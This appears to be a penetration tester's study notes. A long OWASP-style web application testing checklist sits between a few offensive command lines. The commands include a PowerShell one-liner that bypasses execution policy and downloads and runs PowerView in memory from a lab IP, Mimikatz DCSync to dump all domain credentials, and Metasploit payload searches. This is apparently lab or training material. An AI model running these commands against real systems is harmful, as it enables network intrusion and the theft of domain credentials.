powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.152/powerview.ps1');Get-NetSession -ComputerName dc01 | Format-Table"
C:\tools\active_directory> Import-Module .\PowerView.ps1
Get-NetSession -ComputerName dc01 | Format-Table
Invoke-EnumerateLocalAdmin | Format-Table
privilege::debug
lsadump::dcsync /domain:corp.com /all /csv
Manually explore the site
Spider/crawl for missed or hidden content
Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
Check the caches of major search engines for publicly accessible sites
Check for differences in content based on User Agent (e.g. mobile sites, access as a search engine crawler)
Perform Web Application Fingerprinting
Identify technologies used
Identify user roles
Identify application entry points
Identify client-side code
Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
Identify co-hosted and related applications
Identify all hostnames and ports
Identify third-party hosted content
Check for commonly used application and administrative URLs
Check for old, backup and unreferenced files
Check HTTP methods supported and Cross Site Tracing (XST)
Test file extensions handling
Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
Test for policies (e.g. Flash, Silverlight, robots)
Test for non-production data in live environment, and vice-versa
Check for sensitive data in client-side code (e.g. API keys, credentials)
Check SSL Version, Algorithms, Key length
Check for Digital Certificate Validity (Duration, Signature and CN)
Check credentials only delivered over HTTPS
Check that the login form is delivered over HTTPS
Check session tokens only delivered over HTTPS
Check if HTTP Strict Transport Security (HSTS) in use
Test for user enumeration
Test for authentication bypass
Test for bruteforce protection
Test password quality rules
Test remember me functionality
Test for autocomplete on password forms/input
Test password reset and/or recovery
Test password change process
Test CAPTCHA
Test multi factor authentication
Test for logout functionality presence
Test for cache management on HTTP (e.g. Pragma, Expires, Max-age)
Test for default logins
Test for user-accessible authentication history
Test for out-of channel notification of account lockouts and successful password changes
Test for consistent authentication across applications with shared authentication schema / SSO
Establish how session management is handled in the application (e.g. tokens in cookies, token in URL)
Check session tokens for cookie flags (httpOnly and secure)
Check session cookie scope (path and domain)
Check session cookie duration (expires and max-age)
Check session termination after a maximum lifetime
Check session termination after relative timeout
Check session termination after logout
Test to see if users can have multiple simultaneous sessions
Test session cookies for randomness
Confirm that new session tokens are issued on login, role change and logout
Test for consistent session management across applications with shared session management
Test for session puzzling
Test for CSRF and clickjacking
Test for path traversal
Test for bypassing authorization schema
Test for vertical Access control problems (a.k.a. Privilege Escalation)
Test for horizontal Access control problems (between two users at the same privilege level)
Test for missing authorization
Test for Reflected Cross Site Scripting
Test for Stored Cross Site Scripting
Test for DOM based Cross Site Scripting
Test for Cross Site Flashing
Test for HTML Injection
Test for SQL Injection
Test for LDAP Injection
Test for ORM Injection
Test for XML Injection
Test for XXE Injection
Test for SSI Injection
Test for XPath Injection
Test for XQuery Injection
Test for IMAP/SMTP Injection
Test for Code Injection
Test for Expression Language Injection
Test for Command Injection
Test for Overflow (Stack, Heap and Integer)
Test for Format String
Test for incubated vulnerabilities
Test for HTTP Splitting/Smuggling
Test for HTTP Verb Tampering
Test for Open Redirection
Test for Local File Inclusion
Test for Remote File Inclusion
Compare client-side and server-side validation rules
Test for NoSQL injection
Test for HTTP parameter pollution
Test for auto-binding
Test for Mass Assignment
Test for NULL/Invalid Session Cookie
Test for anti-automation
Test for account lockout
Test for HTTP protocol DoS
Test for SQL wildcard DoS
Test for feature misuse
Test for lack of non-repudiation
Test for trust relationships
Test for integrity of data
Test segregation of duties
Check if data which should be encrypted is not
Check for wrong algorithms usage depending on context
Check for weak algorithms usage
Check for proper use of salting
Check for randomness functions
Test that acceptable file types are whitelisted
Test that file size limits, upload frequency and total file counts are defined and are enforced
Test that file contents match the defined file type
Test that all file uploads have Anti-Virus scanning in-place.
Test that unsafe filenames are sanitised
Test that uploaded files are not directly accessible within the web root
Test that uploaded files are not served on the same hostname/port
Test that files and other media are integrated with the authentication and authorisation schemas
Test for known vulnerabilities and configuration issues on Web Server and Web Application
Test for default or guessable password
Test for non-production data in live environment, and vice-versa
Test for Injection vulnerabilities
Test for Buffer Overflows
Test for Insecure Cryptographic Storage
Test for Insufficient Transport Layer Protection
Test for Improper Error Handling
Test for all vulnerabilities with a CVSS v2 score > 4.0
Test for Authentication and Authorization issues
Test for CSRF
Test Web Messaging
Test for Web Storage SQL injection
Check CORS implementation
Check Offline Web Application
set-executionpolicy unrestricted
db_nmap 10.11.1.8 -A -Pn
msf5 > search smb type:auxiliary
search meterpreter type:payload